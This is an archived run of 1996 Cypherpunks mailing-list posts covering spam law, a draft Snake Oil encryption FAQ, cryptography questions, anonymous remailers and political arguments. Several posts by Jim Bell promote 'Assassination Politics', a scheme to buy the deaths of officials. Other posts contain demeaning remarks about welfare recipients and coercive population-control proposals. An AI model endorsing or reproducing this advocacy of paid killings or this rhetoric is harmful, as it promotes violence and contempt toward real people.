You also need to be a registered HotWired member (there is no charge for registration - visit http://www.hotwired.com/ for details). This forum is the 6th in a series of events organized by the Center for Democracy and Technology and the Voters Telecommunications Watch with the purpose of bringing the Internet Community into the debate over critical Internet policy issues. For further information, please visit the following sites: * For Background on the Encryption Issue: The Encryption Policy Resource Page: http://www.crypto.com/ CDT's Encryption Policy Issues Page: http://www.cdt.org/crypto/ * For details on Congress and the Internet: CDT's Congress and the Net Page http://www.cdt.org/net_congress/ Voters Telecommunications Watch: http://www.vtw.org/ HotWired's WiredSide Chat: http://www.hotwired.com/ ----------------------------------------------------------------------- (2) SUBSCRIPTION INFORMATION Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post news distribution list. CDT Policy Posts, the regular news publication of the Center For Democracy and Technology, are received by nearly 10,000 Internet users, industry leaders, policy makers and activists, and have become the leading source for information about critical free speech and privacy issues affecting the Internet and other interactive communications media. To subscribe to CDT's Policy Post list, send mail to policy-posts-request at cdt.org with a subject: subscribe policy-posts If you ever wish to remove yourself from the list, send mail to the above address with a subject of: unsubscribe policy-posts ----------------------------------------------------------------------- (3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies. Contacting us: General information: info at cdt.org World Wide Web: URL:http://www.cdt.org/ FTP URL:ftp://ftp.cdt.org/pub/cdt/ Snail Mail: The Center for Democracy and Technology 1634 Eye Street NW * Suite 1100 * Washington, DC 20006 (v) +1.202.637.9800 * (f) +1.202.637.0968 ----------------------------------------------------------------------- End Policy Post 2.31 9/16/96 ----------------------------------------------------------------------- From iang at cs.berkeley.edu Mon Sep 16 18:53:26 1996 From: iang at cs.berkeley.edu (Ian Goldberg) Date: Tue, 17 Sep 1996 09:53:26 +0800 Subject: Unsolicited email advertising already illegal in US? Message-ID: <199609162154.OAA08632@abraham.cs.berkeley.edu> -----BEGIN PGP SIGNED MESSAGE----- This piece from RISKS looks interesting. My computer certainly _is_ "equipment which has the capacity to transcribe text or images (or both) from an electronic signal received over a regular telephone line onto paper." Now, are HipCrime et al. liable for $500 in damages for each piece of spam? If so, where do I sign up? - Ian - ---8<---8<--- Date: Thu, 12 Sep 1996 19:46:42 -0400 From: Dan Franklin Subject: Sometimes junk e-mail is already a fax, legally speaking I've been using the following legal information, which I picked up from another mailing list (Keith Bostic's /dev/null list), in my responses to junk e-mail these days. So far I haven't yet received junk e-mail on my home computer while it had a printer attached, but one of these days... Under US Code Title 47, Sec.227(b)(1)(C): "It shall be unlawful for any person within the United States to use any telephone facsimile machine, computer, or other device to send an unsolicited advertisement to a telephone facsimile machine" A "telephone facsimile machine" is defined in Sec.227(a)(2)(B) as: "equipment which has the capacity to transcribe text or images (or both) from an electronic signal received over a regular telephone line onto paper." Under this definition, an e-mail account, modem, computer and printer together constitute a fax machine. The rights of action are as follows. Under Sec.227(b)(3)(B): "A person or entity may, if otherwise permitted by the laws or rules of court of a State, bring in an appropriate court of that State -- (A) an action based on a violation of this subsection or the regulations prescribed under this subsection to enjoin such violation, (B) an action to recover for actual monetary loss from such a violation, or to receive $500 in damages for each such violation, whichever is greater, or (C) both such actions. If the court finds that the defendant willfully or knowingly violated this subsection or the regulations prescribed under this subsection, the court may, in its discretion, increase the amount of the award to an amount equal to not more than 3 times the amount available under subparagraph (B) of this paragraph." For the full legal text USC Title 47, Section 227, see: http://www.law.cornell.edu/uscode/47/227.html Dan Franklin dfranklin at bbn.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj3MlEZRiTErSPb1AQFSIgP/SKn68eix0cgOMa2QgOsAJ7IePBZitECs 1KflgL0ziSW9D5JBhYmjAfl3UoFF7UJ1vyROFUV7sgBB1PSXGAvBGycSqrIhciPh Fm/73HUT0pr4foyTAPOndhAOx3ls61+kT497TUx+BecPhtfI41Mu0zTdPaZdWogP vaxfu97SuWw= =OC/R -----END PGP SIGNATURE----- From daw at cs.berkeley.edu Mon Sep 16 18:59:16 1996 From: daw at cs.berkeley.edu (David Wagner) Date: Tue, 17 Sep 1996 09:59:16 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <199609162254.PAA05380@joseph.cs.berkeley.edu> In article , Lucky Green wrote: > On Sun, 15 Sep 1996, Dale Thorn wrote: > > Just a comment: "The world population really should go back to around > > one billion", etc. And how could we achieve that without severe govt. > > oppression, one wonders? > > Quite simple. End all food and medical aid to developing countries paid > for with money stolen at gunpoint from our citizens. Or make Norplant > implants the condition for financial/in kind aid. Both US and > abroad. Why stop there? Make biometric ID implants the condition for welfare and financial aid, so we can track them in case they spend it on (gasp!) donations to the Libertarian party. Government scholarships for education and research? Better wiretap their phones & emails, in case the recipients use the scholarships to work on strong non-GAKed cryptography. Hell, folks are also taking advantage of government money every time they step foot on a park or government road: might as well require citizen-units to escrow their identity and confiscate their guns as a condition of usage. ``Buckle your thought-escrow-unit, it's the law!'' From jbugden at smtplink.alis.ca Mon Sep 16 19:09:50 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Tue, 17 Sep 1996 10:09:50 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <9608168429.AA842914706@smtplink.alis.ca> jbugden at smtplink.alis.ca wrote: > By spreading the risk you minimize the cost. m5 at tivoli.com wrote: >Yea right. Actually, yes. Canada has a single payer system and we spend about two thirds as much as the U.S. on health care as a percentage of G.N.P. We manage to insure all Canadians while about 35% of people in the U.S. have *no* health insurance. Yes, the insurance premium is not optional. Yes, it *is* cheaper. Ciao, James From shamrock at netcom.com Mon Sep 16 19:20:52 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 17 Sep 1996 10:20:52 +0800 Subject: Free RSA chip Message-ID: I secured a 30 page data sheet for the new NTT (actually NLC, a subsidiary of NTT) RSA accelerator chips. The NLC0048 LSI chip can handle keys up to 1024 bits. The secret key can be stored on-chip. If you want a copy of the data sheet, email me your fax number. Furthermore, I have *one* sample chip that I am willing to loan to somebody in the SF Bay Area with sufficient hardware knowledge to put the chip to good use. If you think you qualify, let me know who you are and why you think that you should get the chip. I apologize in advance to the qualified candidates that do not get the chip. There is only one (that I can loan out). --Lucky From jimbell at pacifier.com Mon Sep 16 19:27:09 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 17 Sep 1996 10:27:09 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609162031.NAA23954@mail.pacifier.com> At 02:00 AM 9/16/96 -0700, Timothy C. May wrote: >As to the "social safety net," things are far, far beyond a simple safety >net. When 14-year-old pregnant inner city girls are given money to set up >their own households (cf. Charles Murray's "Losing Ground"), this is not a >"safety net," this is subsidized breeding. A friend of mine (who can be just as coarse as I) calls them "Welfare-powered bastard factories." Jim Bell jimbell at pacifier.com From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 16 19:29:52 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 17 Sep 1996 10:29:52 +0800 Subject: Edited Edupage, 15 Sept 1996 Message-ID: <01I9JSD6BN2K8Y4X3Y@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 16-SEP-1996 10:15:59.50 >To: IN%"edupage at elanor.oit.unc.edu" "EDUCOM Edupage Mailing List" >************************************************************ >Edupage, 15 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >************************************************************ >SATELLITE BROADCASTERS MUST PROVIDE EDUCATION, TOO >A federal appeals court in Washington has ruled that any company providing >direct broadcast satellite (DBS) services must "reserve a portion of its >channel capacity, equal to not less than 4 percent nor more than 7 percent, >exclusively for noncommercial programming of an educational or information >nature," in compliance with regulations drafted by the FCC to enforce laws >enacted in 1984 and 1992. The unanimous decision rejected arguments by Time >Warner and other broadcasters that the law interfered with their First >Amendment rights. "It is the right of the viewers and listeners, not the >right of the broadcasters, which is paramount," said the court, quoting a >1969 Supreme Court ruling. (Chronicle of Higher Education 13 Sep 96 A29) Bloody socialist Supreme Court... sell the _full_ rights, then use the money to reduce taxes. >SYSTEM CRACKER GOT RECIPE FROM HACKER MAGAZINE >The person who disabled New York's Panix Internet service probably followed >the line-by-line instructions for doing so that appeared in the latest issue >of 2600 magazine, the Hacker's Quarterly. "We need to educate the community >that it's very, very simple to cause massive mayhem," says 2600's editor, >who defended his editorial judgment. "A lot of companies subscribe to us so >they can learn before they're victimized." Panix's co-owner says he >supports 2600's right to publish such information: "As a matter of >principle I don't think they should have been stopped," but adds that unlike >most other recipes for breaching security published in the magazine, this >one has no known technical defense. (Wall Street Journal 13 Sep 96 B5) Helpful to quote Panix on it. >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. >*********************************************************** >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >Henry R. Luce (if your name is Henry R. Luce; otherwise, substitute your >own name). ... To cancel, send a message to: listproc at educom.unc.edu with >the message: unsubscribe edupage. (If you have subscription problems, send >mail to manager at educom.unc.edu.) From WlkngOwl at unix.asb.com Mon Sep 16 19:31:35 1996 From: WlkngOwl at unix.asb.com (Deranged Mutant) Date: Tue, 17 Sep 1996 10:31:35 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] Message-ID: <199609161749.NAA14132@unix.asb.com> For those not-yet-in-the-know: I no longer have the time to manage it and asked for somebody (and Matt agreed to) to take the Snake Oil FAQ's care and feeding. Note that this is not cc'd to coderpunks. I don't think it's appropriate for coderpunks. On 16 Sep 96 at 9:56, C Matthew Curtin wrote: [..] > --------------------------- snake-oil-faq ---------------------------- > > Snake-Oil Warning Signs > Encryption Software to Avoid [..] > The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt, > alt.security, comp.security, and comp.infosystems. We're targeting those who Does it need to be posted monthly? Better to post pointers to it most of the time, possibly to other places as well (alt.2600 comes to mind...). Perhaps when the first 'non-beta' of this document is released a History could be added. [..] > Different products will serve different needs, and it's rare that a product > will serve every need. (Sometimes a product won't be needed: it may be Nitpick: Hm. Change that to "no product will serve every need". > better to use a utility to encrypt files, transmit them over a network using > standard file transfer tools, and decrypt them at the other end than to use > a separate encrypted utility in some cases.) Or more clearly: is encryption THE feature of the utility, or is it an added feature? It's better to use separate utilities made for that purpose rather than one that tries to do everything. [..] > Key Sizes > > Some ciphers, while currently secure against most attacks, are not > considered viable in the next few years because of relatively small keysizes > and increasing processor speeds (making a brute-force attacks feasible). The Change to "making brute force attacks--that is, trying every possible key--feasible". [..] > Symmetric and Public-Key Lengths With > Similar Resistance to Brute-Force Attacks > > Symmetric Key Length Public-key Key Length > 56 bits 384 bits > 64 bits 512 bits > 80 bits 768 bits > 112 bits 1792 bits > 128 bits 2304 bits That's a controversial comparison. I've read references (from a couple of years ago) saying that a 3k-bit RSA key is as strong as a 128-bit IDEA key. Trying to compare the two (symmetric and assymetric) is like running through a tar pit. > Some Common Snake-Oil Warning Signs > > The following are some of the "red flags" one should watch for when > examining an encryption product > > * Technobabble [..] > A sign of technobabble is a descrption which drops a lot of technical > terms for how the system works without actually explaining how it > works. Often specifically coined terms are used to describe the scheme > which are not found in the literature. Of course, how is an amateur supposed to know if these terms are found in the literature? That was a recurring comment that people sent me when I first posted the FAQ. [..] > Just because software uses to different method of computation Typo! "uses to different method..."? [..] > grounded in mathematical theory. The security is based on problems that > are believed, if not known to be hard to solve. Hm. How about "that are widely believed"? [..] > A OTP system is not an algorithm. It works by having a "pad" of > random bits in the possession of both the sender and recipient. [..] > never again be used. The bits in the pad must be truly random, > generated using a real random source, such as specialized > hardware, radioactive decay timings, etc., and not from an > algorithm or cipher. Anything else is not a one-time-pad. Although it is(?) mentioned below, I'd emphasize here in some way that the users of the OTP generate the key. Somebody else sending you a supposed OTP that he generated is not secure. > The vendor may confuse random session keys or initialization vectors > with OTPs. Explain random session keys and initialization vectors. A glossary at the end of the document would be a good thing. > Sometimes attacks are theoretical or impractical (requiring special > circumstances or massive computing power running for many years), and > it's easy to confuse a layman by mentioning these. Oh yeah. These need to be explained. What I had in mind was timing attacks against RSA or IDEA, or factoring of public keys. > * Keys and Passwords > > The "key" and the "password" are often not the same thing. The "key" "often" not?!? (oops...was that my wording?) They aren't the same, though often they are confused in snake oil. [..] > If there's a third-party utility that can crack the software, > avoid it. > > If the vendor claims it can recover lost passwords (without using a > key-backup or escrow feature), avoid it. > > If there is a key-backup or escrow feature, are you in control > of the backup, or does the vendor or someone else hold a copy > of the key? That is, if you lose the key, you don't want a third party to have as much a chance to recover it as you do. [..] > > If the vendor is unaware of export restrictions, avoid the software: > the vendor is not familiar with the state of the art. Also... if the vendor does not understand export restrictions, avoid the software. I'm thinking of a certain snoil-vendor who said 128-bit IDEA keys were'nt secure since they could be exported. > Because of export restrictions, some legitimate (not-Snake Oil) > products may have a freely exportable version for outside of the USA, > which is different from a separate US/Canada-only distribution. Also Such exportable versions are not as secure, of course. [..] > Other Considerations > > Interface isn't everything: user-friendliness is an important factor, but if > the product isn't secure then you're better off with something that is > secure (if not as easy to use). > > No product is secure if it's not used properly. You can be the weakest link > in the chain if you use a product carelessly. Do not trust any product to be > foolproof, and be wary any product that claims it is. I wanted to add some sort of 'non-guru hacks' to test a product. One example might be to actually examine 'encrypted' files to see if they are really encrypted. (I'm thinking of the AMG archiver, which only encrypted the CRC; CODEC archiver also only encrypted the CRC is a file is not compressed.) Thanks again for taking over the FAQ. A good job! Rob --- No-frills sig. Befriend my mail filter by sending a message with the subject "send help" Key-ID: 5D3F2E99 1996/04/22 wlkngowl at unix.asb.com (root at magneto) Send a message with the subject "send pgp-key" for a copy of my key. From paul at fatmans.demon.co.uk Mon Sep 16 19:40:03 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 17 Sep 1996 10:40:03 +0800 Subject: Diffie Hellman - logs in Galois fields Message-ID: <842896368.27767.0@fatmans.demon.co.uk> Hi all, A question for the matematicians out there: I am looking at the Diffie Hellman public key exchange protocol and am trying to find out why it is computationally hard to take logs in a finite (Galois) field. My maths tutor has told me a bit about the construction of Galois fields (If I`m correct the construction is Z mod N, N some integer, then a transformation F(x) on the residue classes already in the field) I know also the definition is that there are P**k elements, p a prime. My questions are as follows: 1. How can a field be finite, as by definition it has to be closed under addition, subtraction, multiplication and division???? (sorry if this one is a bit of a no brainer, maybe the definition is different but I can`t seem to see how) 2. Why is taking logs in a finite field computationally hard? - Me and Alec (My maths tutor at college) guessed that it is because exponentiation and logs are each others inverse functions, and somehow this becomes a one way function in a finite field. 3. Are the Galois fields used in Diffie Hellman specially constructed in any way or are they just normal GF???? Thanks for any help anyone can give me.... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From jimbell at pacifier.com Mon Sep 16 19:52:48 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 17 Sep 1996 10:52:48 +0800 Subject: The Living and the Dead Message-ID: <199609162030.NAA23935@mail.pacifier.com> At 12:40 PM 9/16/96 -0400, Brian Davis wrote: >On Sun, 15 Sep 1996, jim bell wrote: > >> .... >> How would an AP-type system treat Robert McNamara? He'd be dead in a >> second. To those who say, "What good would this do?" I respond: Anyone in > ^^^^^^ >Kind of kills the betting pool, doesn't it? > >EBD Okay, it was just an expression... It would probably take a couple weeks. Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Mon Sep 16 19:55:26 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 17 Sep 1996 10:55:26 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609162031.NAA23962@mail.pacifier.com> At 11:24 AM 9/16/96 EDT, Dr.Dimitri Vulis KOTM wrote: >jbugden at smtplink.alis.ca writes: >> dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote: >> >Starting with the lying old fart himself. >> >> You shouldn't be so hard on Tim. I tried giving up farting years ago but I = >> found >> I gained a lot of weight. It's also become more socially acceptable as evid= > >I wonder why containing one's fart would cause one to gain weight. Volume maybe, >but I'd think that gas weight about as much as the air it displaces. Actually, less: It's mostly hydrogen. Jim Bell jimbell at pacifier.com From hallam at ai.mit.edu Mon Sep 16 20:01:56 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 17 Sep 1996 11:01:56 +0800 Subject: Spam blacklist project Message-ID: <9609162025.AA00550@etna.ai.mit.edu> Hi, The following idea just hit me. How about a server which maintained a list of people who don't want to recive SPAM? The idea being that email recpients who don't want SPAM send their email address to the list. A SPAMer who want to check an email to see if it is on the list could then obtain the SHA-Digested list of addresses and remove them from their internal databases. Of course I don't for a moment imagine that this will be 100% effective. Without government regulation there will always be slimeballs who send mail to people who don't want it. The advantage of this scheme is that it would mean that the spam industry can avoid regulation pressure and they can deflect criticism. Meanwhile recipients of unwanted spam have a legitimate beef. Comments? Phill From stewarts at ix.netcom.com Mon Sep 16 20:03:18 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 17 Sep 1996 11:03:18 +0800 Subject: New Remailers? Message-ID: <199609161835.OAA01049@attrh1.attrh.att.com> At 10:53 AM 9/16/96 BST, you wrote: >I recently secured an account with anon.penet and then a few days later got >a post informing me that the servive was now terminated. Anybody out there >know of any remailers where you dont have to have a Phd in computer science >and a thorough working knowledge of PGP in order to operate? Raph Levien's remailer list lives at http://www.cs.berkeley.edu/~raph/remailer-list.html Most of the remailers on it are the one-way variety - you can send mail to someone anonymously, but you don't get an address for people to reply to you. They're easy to use. Some of them also support anonymous reply blocks, which are a somewhat difficult-to-use feature - you basically PGP-encrypt your return address (in the correct syntax), and tell anybody who wants to reply to you to include the block at the beginning of their mail. There have been some pseudonym servers besides anon.penet.fi, which provide higher security, and are easier to use than anonymous reply blocks, once you set them up (which generally involves creating anonymous reply blocks :-) Two of them have been spammed to death, but the cyber remailer at alias at alias.cyberpass.net is still up. Send it a request for help to get information. Raph has a new system coming soon; see his remailer list for details. Private Idaho is Joel McNamara's friendly user interface for remailers and PGP. http://www.eskimo.com/~joelm/pi_list.html . Runs on MSWindows. It made it _much_ easier to use the alpha nymserver while that was still alive; don't know if the new version supports cyber yet or not. Remailer security depends on encryption - otherwise wiretappers can watch mail going into the remailer and know where it's going. So you'll need to learn to use PGP, but it's pretty straightforward, and Private Idaho makes it more convenient. The Mixmaster remailers provide higher security remailing, also with no reply capability; you need to get special client software, which I think isn't ported to Windows yet? >Also, are there any remailers which will accept binary attachments? There are three popular ways to do binary attachments - 1) MIME-encoding (uses MIME headers and maybe a 7-bit content transfer encoding.) 2) UUENCODE (simple-minded header and 7-bit ASCII.) 3) Mail-handler-specific headers with binary stuff following Uuencode is a no-brainer - just stick the uuencoded binary after the remailer headers. As far as I know, none of the remailers are particularly MIME-aware, but they do glue headers together. So you could probably start sticking MIME headers after the remailer headers and try a few times to get it to work. Mail-handler-specific behaviour is, of course, mail-handler-specific :-) You can try it and see, and remember that the person at the other end may not have the same kind of mail handler you do, so even if you sent the mail directly instead of through a remailer, it might not work. You may have trouble getting your mail client to do what you want for sending the message (e.g. if you use Cc:Mail or MSMail.) I looked at the code for my remailer, which is a modified Ghio2, though I don't think I modified this part, and it'll trash binaries. The problem is that, after processing headers, it shoves the rest of the input stream into the output file by a loop of fgets() check for cutmarks fprintf() which will trash anything that contains nulls, and may not do the right thing for newlines either, though it won't bother high-bits. I suppose it wouldn't be too hard to write a getchar/putchar loop that checks for cutmarks while transferring data safely (this would be easier if cutmark behaviour includes outputting the cutmark.) However, the remailer uses the native mail program (e.g. sendmail) to forward the mail, so if your sendmail trashes binaries, or does annoying vestigial things like changing "From " to ">From " at the beginnings of lines, it'll still lose. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From lksmith at perseus.peganet.com Mon Sep 16 20:09:51 1996 From: lksmith at perseus.peganet.com (Luke Smith) Date: Tue, 17 Sep 1996 11:09:51 +0800 Subject: Excite Live! In-Reply-To: <01I9EA0TKKDS9ULOQC@mbcl.rutgers.edu> Message-ID: On Thu, 12 Sep 1996, E. Allen Smith wrote: > From: IN%"live at excite.com" 11-SEP-1996 22:14:03.06 > > >A request was made for the location of your Excite Live! page > > >Found your Excite Live at URL > >http://live.excite.com/?uid=CEC8C99632372D6E > > Hi. As you can see from the above, I've set up an Excite Live! > page up with the email address of cypherpunks at toad.com. It has top priority > on things related to cypherpunks, including technology news, political news, > international news, etcetera, plus some build-in links and searches to > appropriate places. I'd advise using the anonymizer to access the above > link (http://www.anonymizer.com:8080/http://live.excite.com/?uid=). > -Allen > well i dunno about that but HTTP://WWW.BOMBNET.COM/CHAPTER9/ is the BEST web page I have ever visited! it has live chat and even info! this site rocks! From hallam at ai.mit.edu Mon Sep 16 20:18:12 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 17 Sep 1996 11:18:12 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <199609162001.NAA21875@mail.pacifier.com> Message-ID: <9609162033.AA32637@etna.ai.mit.edu> >Yet another obligatory AP (Assassination Politics) reference: If a person >is really interested in helping out "starving children" he may be able to do >far more good by purchasing the death of the local tyrant(s), rather than >(just) buying more food. The problem is that assasination rarely leads to the installation of a government that is any better. In most cases it gets worse. In the past the US excuse for supporting bloodthirsty murderers like Pinochet, Saddam, Marcos and Noriega was that the alternative was worse. In cases like Eritrea or Ethiopia the average term of office of any given despot tends to be rather short in any case. In most cases its a case of there being little to choose between the leaders of the various factions and that ending the war on any terms is better than allowing it to continue. Phill From jimbell at pacifier.com Mon Sep 16 20:19:15 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 17 Sep 1996 11:19:15 +0800 Subject: Kiddie porn on the Internet Message-ID: <199609162001.NAA21875@mail.pacifier.com> At 08:51 AM 9/15/96 -0700, James A. Donald wrote: >[Allegations that "save the children" is a political organization >providing cover for an effort to ban cryptography] > >At 01:54 PM 9/9/96 -0400, Hallam-Baker wrote: >> Their main mission is sending food to Ethiopia and other famine >> areas, development work etc. It is ultra-worthy stuff. > >Not everyone who sends food to the starving children is ultra >respectable. >Problem is that the usual cause of starving children is tyranny. >In order to get close enough to the starving children to take >those cute fund raising photographs you have to pay off and get >cosy with tyrants. This creates a moral hazard, in that it is >hard to tell the difference between normal bribery needed to do >anything in a tyrannical state, and bribery to bribe tyrants to >create starving children for photo ops. >It is very common for international charities to develop excessively >friendly relationships with murderous tyrannies, Yet another obligatory AP (Assassination Politics) reference: If a person is really interested in helping out "starving children" he may be able to do far more good by purchasing the death of the local tyrant(s), rather than (just) buying more food. After all, if the donor really believes that this starvation isn't endemic to the country, he has to conclude that it's a condition which is forced on the victims. In addition, you almost always find that these starving countries have well-supplied militaries, defending the local warlords against each other as in Somalia. Indeed, in Somalia the incoming food was actually used to buoy up one group against another, because access to it is controlled directly or indirectly by the factions. Some might argue that the death of a single leader doesn't normally fix the problem. While that's often true, it's normally because there isn't an automatic guarantee that the next 20+ leaders will ALSO be killed if they display the same problems as the first. Provide that guarantee, and (somewhat paradoxically) not only do you not need to kill the 20+, you probably won't have to kill the first one! (wondering when the world will see the light...) Jim Bell jimbell at pacifier.com From paul at fatmans.demon.co.uk Mon Sep 16 20:25:09 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 17 Sep 1996 11:25:09 +0800 Subject: Redundancy in XOR encryption Message-ID: <842896374.27768.0@fatmans.demon.co.uk> -----BEGIN PGP SIGNED MESSAGE----- I have a question I hope someone here might be able to answer: As the method of cryptanalysis of XOR (Ie. index of coincidence) relies on redundancy in the plaintext, would the following be strong: Compress P to get perfect compression (ie. 0 redundancy) Encrypt F (the compressed text) using a repeated key XOR of course this is all rather theoretical as there is no such thing as perfect compression, but I just thought it might be interesting to see if this is indeed strong, superficially it appears so to me... -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: cp850 iQCVAwUBMj2TvL5OPIRbv66xAQGRpgP+LU0Y8sxzO6rObCYAQdrD8/R/iDJN3m0Z 4ZetS7jcbz7wT6bj2l7Usb0F4h/YMhxtl0y9EQ91ozg35jfRKdy2IwUoMDvqsVSZ wKmaM/DpEt2LDyRQnzIvlNYQp6/eXQoBUb7r9SH/dZbjM7culpjzJLhd07Nx5okE jUmPNBLm9m0= =RHie -----END PGP SIGNATURE----- Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From nobody at cypherpunks.ca Mon Sep 16 20:32:08 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Tue, 17 Sep 1996 11:32:08 +0800 Subject: Pro-CODE bill may not help much Message-ID: <199609161948.MAA07327@abraham.cs.berkeley.edu> After reading the text of Senator Burns's pro-CODE bill (S.1726), I'm not convinced that the bill would actually remove the barriers to the export of PGP and other strong encryption software. I'd like to know whether you agree with my concerns, or if you think that the bill would adequately protect encryption software exports. shabbir at vtw.org (Voters Telecommunications Watch) writes: >DESCRIPTION OF S.1726, PRO-CODE BILL >The Pro-CODE Act resolves to: > >1. Allow for the *unrestricted* export of "mass-market" or "public-domain" > encryption programs, including such products as Pretty Good Privacy and > popular World Wide Web browsers. > >2. Requires the Secretary of Commerce to allow the less restricted export > of other encryption technologies if products of similar strength are > generally available outside the United States, roughly up to DES > strength. > >3. Prohibits the federal government from imposing mandatory key-escrow > encryption policies on the domestic market and limiting the authority > of the Secretary of Commerce to set standards for encryption products. I'm not sure that this interpretation of the pro-CODE bill is correct, at least as far as points (1) and (2) are concerned. It appears to me that the bill allows the goverment to retrict all exports of cyptographic software for general use, as long as similar retrictions are imposed on the export of software for use by foreign banks. PGP could still be prohibited. I will quote the relevant sections of the bill, with my comments. >From the text of the Pro-CODE Bill: >SEC.3 DEFINITIONS. > > (8) GENERAL LICENSE- The term "general license" means a > general authorization that is applicable to a type of > export that does not require an exporter of that type > export to, as a condition to exporting- > (A) submit a written application to the 